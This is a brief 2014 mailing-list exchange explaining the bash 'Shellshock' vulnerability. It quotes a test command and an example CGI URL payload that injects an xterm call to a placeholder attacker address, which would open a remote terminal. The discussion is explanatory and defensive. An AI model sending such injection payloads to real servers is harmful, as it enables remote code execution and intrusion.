24 Sep
2014
24 Sep
'14
11:13 a.m.
On 25/09/2014 2:03 pm, Kerry Thompson wrote:
As I understand it, the problem is significantly worse than that. It's possible to add shell commands after the closing '}' which subsequently get executed by bash, for example:
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
- this really should not do what it actually does.
The big risk is in CGI execution under web servers. Apache (and others) automatically add CGI URI arguments as environment variables prior to executing CGI scripts. So if I find a CGI script on your web site, and add "?foo='() { ;;}; xterm -display my.ip.address:0.0'" into the URL
Why would you run an Xserver that is accepting connections from internet? That seems like a bit of a problem. -- Steve.